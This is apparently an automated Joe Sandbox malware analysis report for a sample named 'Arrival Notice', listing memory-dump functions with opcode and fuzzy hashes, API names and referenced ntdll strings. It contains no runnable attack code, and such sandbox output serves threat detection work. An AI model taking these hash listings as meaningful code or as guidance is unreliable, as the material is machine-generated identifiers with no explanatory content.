                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4ca149785ab8289eec92a68ab906ac3bfc6395442d2e20c991c7683ccf5f4393
                                                                              • Instruction ID: 07eada01529ba87c4352b0d10d100044bc63bafdd0c7b049882890df24c07501
                                                                              • Opcode Fuzzy Hash: 4ca149785ab8289eec92a68ab906ac3bfc6395442d2e20c991c7683ccf5f4393
                                                                              • Instruction Fuzzy Hash: 25118276A40716ABDB21EF59DD80B5EFBB8FF84750F940459DA01AF200D730ED018B50
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d0fae7b8472c7e5bd768ed6c07998b8b1eeccd78bfff12cc16db8cdcd782f41a
                                                                              • Instruction ID: 57207b506a172401cec202e9b392558f4ba272a1a95110f7a4d48e1ba9b0bcd3
                                                                              • Opcode Fuzzy Hash: d0fae7b8472c7e5bd768ed6c07998b8b1eeccd78bfff12cc16db8cdcd782f41a
                                                                              • Instruction Fuzzy Hash: 270192715001069FC725DF19D84AF16BBF9FBD5354F20816AE1068F275CBB49C42CB94
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                              • Instruction ID: 4208f66c389d291396c2757c56e624d8b1d60d097392cabea6cbf48ba4597d24
                                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                              • Instruction Fuzzy Hash: D411C2716026C29BEB329B2C9944B2D3BD4FB41B88F1904A2DA429F652F728D843C352
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                              • Instruction ID: 2b00b54a2c1ca140e3dde455a11e7a1f5b2d1d9c54b26cbc9c7113f78677fea5
                                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                              • Instruction Fuzzy Hash: B0019232602146AFE721AF5CCD02F5ABAA9FB85750F168428EB05AF270E775DD40C790
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                              • Instruction ID: 55e35b1fac1fd83e57696cfae02ebab36ccb9063a65328627d5bc4372ed343b2
                                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                              • Instruction Fuzzy Hash: 040126314447229BDB318F19D840A367BE8FF55760700896DFC96AF281D331D400CBA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 08a8013eafd4eb6dc09bed867290c9391f6d5f4133811214a860dacbb372aecb
                                                                              • Instruction ID: fcc6f3547dc9726fa7150aef73d57fefda7444c1660332226bd5350e4760b704
                                                                              • Opcode Fuzzy Hash: 08a8013eafd4eb6dc09bed867290c9391f6d5f4133811214a860dacbb372aecb
                                                                              • Instruction Fuzzy Hash: 810184712806029FD3325E19DD40B12BEA8BF95B50F054429F6069F3A4D7B5E841CB68
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0d17a604e296acc74d283920a77db5a50e8a4027b78a80f074fbd3bf216e6dff
                                                                              • Instruction ID: 0cb3dc20e5ced72f10211a4445607b10a85d9ba5d92ea312d36f8140a8c392c3
                                                                              • Opcode Fuzzy Hash: 0d17a604e296acc74d283920a77db5a50e8a4027b78a80f074fbd3bf216e6dff
                                                                              • Instruction Fuzzy Hash: E5F0F932741B21BBC7319F56DC41F077AA9FFC4F90F004029A6059F640D630DD01CAA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                              • Instruction ID: af59be2c3072b01f3e883dcf979f4139df0696e45b7c2aa0d19351e9bced25c8
                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                              • Instruction Fuzzy Hash: 41F0C2B2A00615ABD324CF4DDC40E5BFBEAEBD1A80F048128A605DB220EA31ED04CB90
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                              • Instruction ID: 078f323a443d1ba328e4aa06ba8a361967a6ffa557bf59443ff6792667b8450d
                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                              • Instruction Fuzzy Hash: DFE0DF72A41111BBDB21A799CD01FAABEACEB90EA0F090094B601EB1D4E5B0DE00C6D0
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                              • Instruction ID: 790addb8c6d71b38a01441527bd27cd346dcdc30e9bd15c254b2e2746945d28d
                                                                              • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                              • Instruction Fuzzy Hash: B7E065316403648FDF258A29CA40A93B7AEDF95660F168069EA0547712C331F842C690
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • API String ID:
                                                                              • Opcode ID: 9d18ee9ea872efe2854aca85b033fe11e773f2279f537a11c403bae219672f03
                                                                              • Instruction ID: 24e32efcb2c72b4e7f5b9881673f9d6a54a5db6d1a00de9db26a7a39266c0a15
                                                                              • Opcode Fuzzy Hash: 9d18ee9ea872efe2854aca85b033fe11e773f2279f537a11c403bae219672f03
                                                                              • Instruction Fuzzy Hash: 5090023120544846D140759D4804A460055A7D0715F59C415A0064A94DD6668E55B761
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eaccbfcb8a2d2c9729f54a1a3135bbad6b1d5dc004e76ea4806d005569c6ccb5
                                                                              • Instruction ID: def8b0c9827b6726b0296b1c1d1d02c0ff74de9787a2567dd69854dc0308eab6
                                                                              • Opcode Fuzzy Hash: eaccbfcb8a2d2c9729f54a1a3135bbad6b1d5dc004e76ea4806d005569c6ccb5
                                                                              • Instruction Fuzzy Hash: 8B90023120140806D104759D4C046860045A7D0711F59C415A6024A55ED6A689917231
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 46db4eb606d44d0a9d52b47cbad579ea246d9605a13712a8a342f29e597ca952
                                                                              • Instruction ID: a7883d03770db2565a3b0875c7d8b52a70072dca0fbc160183749a728b40c12e
                                                                              • Opcode Fuzzy Hash: 46db4eb606d44d0a9d52b47cbad579ea246d9605a13712a8a342f29e597ca952
                                                                              • Instruction Fuzzy Hash: 1290023160540806D150759D48147460045A7D0711F59C415A0024A54DC7968B5577A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 349222239b197da7d7fa09a2ec65d595c07cfd84ec6fe7ef2a6bc4677e9e86bb
                                                                              • Instruction ID: 19151822e5a29d51f082ab2fb4742f7fc20fc5022c494b39219a3913818dae3c
                                                                              • Opcode Fuzzy Hash: 349222239b197da7d7fa09a2ec65d595c07cfd84ec6fe7ef2a6bc4677e9e86bb
                                                                              • Instruction Fuzzy Hash: 7F900225211400070105B99D0B045070086A7D5761359C425F1015950CD66289615221
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b976b9c8a6c2e52994bb1f62022eb47799d540c907dc195aec84bde9b3e5e01
                                                                              • Instruction ID: a4f53cf46e9dea7680e3665ffe43630d0a937006d697888892348f056821495b
                                                                              • Opcode Fuzzy Hash: 5b976b9c8a6c2e52994bb1f62022eb47799d540c907dc195aec84bde9b3e5e01
                                                                              • Instruction Fuzzy Hash: 80900225221400060145B99D0A0450B0485B7D6761399C419F1416990CC66289655321
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d1cebc2203564e8b2b7e8dde32649d3106e66be43298e11304152707e1985cd3
                                                                              • Instruction ID: 1ab40a200a62c5770cdc7b5c693b4233469cad9efb97f39f0ba5f83d7c664c21
                                                                              • Opcode Fuzzy Hash: d1cebc2203564e8b2b7e8dde32649d3106e66be43298e11304152707e1985cd3
                                                                              • Instruction Fuzzy Hash: B29002A1201540964500B69D8804B0A4545A7E0611B59C41AE1054960CC56689519235
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c0a85b8fcb5807e59eaa4e316fb19b2054faa0c019076f7c715fc45269ff46f7
                                                                              • Instruction ID: 0a66208ef31bfb049324072e4ce358d1131bbfc1866edab1aa0bbc415883d11c
                                                                              • Opcode Fuzzy Hash: c0a85b8fcb5807e59eaa4e316fb19b2054faa0c019076f7c715fc45269ff46f7
                                                                              • Instruction Fuzzy Hash: A790022921340006D180759D580860A0045A7D1612F99D819A0015958CC95689695321
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3fdfdea9cf610a7d832eaac6476f86ca8c2b7498bc62575d2e916e653d13c117
                                                                              • Instruction ID: 6cc1528c7856879722b7a1f080da2112c82c7353357999e21b9db25fa52d854d
                                                                              • Opcode Fuzzy Hash: 3fdfdea9cf610a7d832eaac6476f86ca8c2b7498bc62575d2e916e653d13c117
                                                                              • Instruction Fuzzy Hash: 5590022120544446D100799D5808A060045A7D0615F59D415A1064995DC6768951A231
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5fad64a423f64dac17bdde66a2f6d879ee9015ff696b78fddab4df4a5c6e28e9
                                                                              • Instruction ID: 88e6f1cbe4fb5489886155b7640a7aea13debd08f8df5083c3296bb036b82e9d
                                                                              • Opcode Fuzzy Hash: 5fad64a423f64dac17bdde66a2f6d879ee9015ff696b78fddab4df4a5c6e28e9
                                                                              • Instruction Fuzzy Hash: B790022130140007D140759D58186064045F7E1711F59D415E0414954CD95689565322
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3550cc17f831f63b771cc8cd2ad1a75827022ca6045e50418d5bf0e35a4d5ea
                                                                              • Instruction ID: f2dc5a2a04a5625ac9e501d9787f4905370446c82593daf2a616490eddc56079
                                                                              • Opcode Fuzzy Hash: d3550cc17f831f63b771cc8cd2ad1a75827022ca6045e50418d5bf0e35a4d5ea
                                                                              • Instruction Fuzzy Hash: 0A900221242441565545B59D48045074046B7E0651799C416A1414D50CC5679956D721
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6a0ef8d8b07a0825799255f9421a1dc0183da03330011ca33930e23f518cf005
                                                                              • Instruction ID: 977fce90e89a4a544daaa7220d058cec1d0fa8f883ab0a95fe897b44b1790600
                                                                              • Opcode Fuzzy Hash: 6a0ef8d8b07a0825799255f9421a1dc0183da03330011ca33930e23f518cf005
                                                                              • Instruction Fuzzy Hash: D390023124140406D141759D48046060049B7D0651F99C416A0424954EC6968B56AB61
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ec3e3d4dbcda0e5742a318d017194fb70ff25d263d528f3b284418cef4789987
                                                                              • Instruction ID: 909fd947ac4329bcb62a9a67202ead123fe85fecaad74a049eb0547a26c9feac
                                                                              • Opcode Fuzzy Hash: ec3e3d4dbcda0e5742a318d017194fb70ff25d263d528f3b284418cef4789987
                                                                              • Instruction Fuzzy Hash: FE90023120140846D100759D4804B460045A7E0711F59C41AA0124A54DC656C9517621
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e77b1e499e2f1327040ca17889ea4447a029eb7817a6f3f15d5f1bc26b2a5db5
                                                                              • Instruction ID: bb45cfe72cf65b2ffbbdbe416472207490c1f1b3f09da27dc14366db19c4e8bb
                                                                              • Opcode Fuzzy Hash: e77b1e499e2f1327040ca17889ea4447a029eb7817a6f3f15d5f1bc26b2a5db5
                                                                              • Instruction Fuzzy Hash: 8B90022160540406D140759D58187060055A7D0611F59D415A0024954DC69A8B5567A1
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d1a71b91007d8afc80ac8ac8f3d620510445149c6c27f1d2f69d184383355a3b
                                                                              • Instruction ID: 4bff24243fd643dfc6463691b1f9036196321401685edd269956587f39735c96
                                                                              • Opcode Fuzzy Hash: d1a71b91007d8afc80ac8ac8f3d620510445149c6c27f1d2f69d184383355a3b
                                                                              • Instruction Fuzzy Hash: 6B90023120140407D100759D59087070045A7D0611F59D815A0424958DD69789516221
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ce2c86829dc97a291a31ee96b68bec4cab28f6195c305e38dea485b82c6d5deb
                                                                              • Instruction ID: 64dfabc8b0ef459ff0dc9cb361e9a6a2668befa8512fdabbface7973250d2bc7
                                                                              • Opcode Fuzzy Hash: ce2c86829dc97a291a31ee96b68bec4cab28f6195c305e38dea485b82c6d5deb
                                                                              • Instruction Fuzzy Hash: A990023120140406D10079DD58086460045A7E0711F59D415A5024955EC6A689916231
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0214816a04cdf4b5f4a7b2d754d7075ecc02541a92abe3134d0c829f40073eba
                                                                              • Instruction ID: 4f943b5eee1b96684c7fba4aeb5cf4b0ed5138fa312523e89f8f8f050ea22237
                                                                              • Opcode Fuzzy Hash: 0214816a04cdf4b5f4a7b2d754d7075ecc02541a92abe3134d0c829f40073eba
                                                                              • Instruction Fuzzy Hash: 6590026121140046D104759D48047060085A7E1611F59C416A2154954CC56A8D615225
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ad93fd34e78f4b08b6926e73c64c521c7f34acedc567a1c86f5971a4106cbc6e
                                                                              • Instruction ID: 22cc7596ed11e0d1dae5eeda48d17c9c4304b7f7bb50038bb5bf0f0f3b3770c3
                                                                              • Opcode Fuzzy Hash: ad93fd34e78f4b08b6926e73c64c521c7f34acedc567a1c86f5971a4106cbc6e
                                                                              • Instruction Fuzzy Hash: 0A90026134140446D100759D4814B060045E7E1711F59C419E1064954DC65ACD526226
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ad0eae349bbe5755e26b7a953716292ee9a959031b7a6555091886b58681b78d
                                                                              • Instruction ID: cbb99a4a6244a3fc36e7f96dffa782efde26c2bb5687d30bbbeece4835bee493
                                                                              • Opcode Fuzzy Hash: ad0eae349bbe5755e26b7a953716292ee9a959031b7a6555091886b58681b78d
                                                                              • Instruction Fuzzy Hash: F9900221211C0046D20079AD4C14B070045A7D0713F59C519A0154954CC95689615621
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: e46c770cf7f0feb3bb708ba913f630ed604dac8146443377ded0d1e8afc9145b
                                                                              • Instruction ID: ced4f857d53951c24ebaf2f0cf68a2d70c81092753a44e75f4c6127723dd39a4
                                                                              • Opcode Fuzzy Hash: e46c770cf7f0feb3bb708ba913f630ed604dac8146443377ded0d1e8afc9145b
                                                                              • Instruction Fuzzy Hash: 1A51D8B5A00216AFCB15DFAC88D49BEFBF8BB48240B548569F469DB641D334EE5087E0
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                              • API String ID: 48624451-2108815105
                                                                              • Opcode ID: 758cc9dac00a8143e3e25cb2e5b62403230e4d788ca8c1854c31e5982589cdbf
                                                                              • Instruction ID: fc390ad8068c5e287c176cfa9bb7c7f381ad423e6b953248e03823dcaf56d546
                                                                              • Opcode Fuzzy Hash: 758cc9dac00a8143e3e25cb2e5b62403230e4d788ca8c1854c31e5982589cdbf
                                                                              • Instruction Fuzzy Hash: A851F475A00A66AFDB31DF9CCCA097EBBF9AB44200B04845DE496DB681E774DA408B60
                                                                              Strings
                                                                              • ExecuteOptions, xrefs: 015E46A0
                                                                              • Execute=1, xrefs: 015E4713
                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015E46FC
                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015E4742
                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015E4725
                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015E4655
                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 015E4787
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                              • API String ID: 0-484625025
                                                                              • Opcode ID: f80b753b09ebcfa3340154666dcb854e807a69264f6ff05d137fc3eb11c99fda
                                                                              • Instruction ID: 2eec66c2ba833380082d96f16abcc55b21f4fe93f933b1371d8e92c5a0142584
                                                                              • Opcode Fuzzy Hash: f80b753b09ebcfa3340154666dcb854e807a69264f6ff05d137fc3eb11c99fda
                                                                              • Instruction Fuzzy Hash: FB510C31A4021A7AEF21EB68DC95FED7BF8BF58304F440099D605AF191D7729A418F50
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction ID: 8241920b243fd5b58ba335ec421d417d5ea687194f0a99765e19443f72ae9605
                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                              • Instruction Fuzzy Hash: AA81A270E052499EEF25CE6CC8D17FEBBB1BF45320F28465AE851AF291C7B49940CB51
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.2004379005.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_1540000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID: %%%u$[$]:%u
                                                                              • API String ID: 48624451-2819853543
                                                                              • Opcode ID: ecefe437a9dbb1cb251bcb4b4bbe01b1aff5eb8fce92b3d469be8c4b0eb69a41
                                                                              • Instruction ID: f22ea5e4a1f9cc605b4f62d35fbf1ecbd3b14f1990ea961ee98b366ee4962923
                                                                              • Opcode Fuzzy Hash: ecefe437a9dbb1cb251bcb4b4bbe01b1aff5eb8fce92b3d469be8c4b0eb69a41
                                                                              • Instruction Fuzzy Hash: 3B21657AA0052AABDB10DF79CC54EEE7BF8EF54641F54011AEA05E7240EB30DA118BA1
